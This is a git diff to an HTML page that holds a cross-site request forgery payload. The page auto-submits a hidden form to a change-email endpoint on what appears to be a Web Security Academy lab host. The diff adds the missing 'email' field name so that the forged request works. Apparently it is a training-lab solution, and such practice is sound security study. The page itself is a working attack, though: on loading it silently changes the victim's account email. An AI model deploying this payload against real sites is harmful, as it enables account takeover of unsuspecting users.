--- a/simple-csrf/index.html
+++ b/simple-csrf/index.html
@@ -1,7 +1,7 @@
 <html>
 	<body>
       	<form id="csrf" method="POST" action="https://0aa100f804c18047811302a30034003a.web-security-academy.net/my-account/change-email">
-          	<input value="b@b.b" type="hidden" />
+          	<input value="b@b.b" type="hidden" name="email" />
       	</form>
       	<script>
           	document.getElementById("csrf").submit();
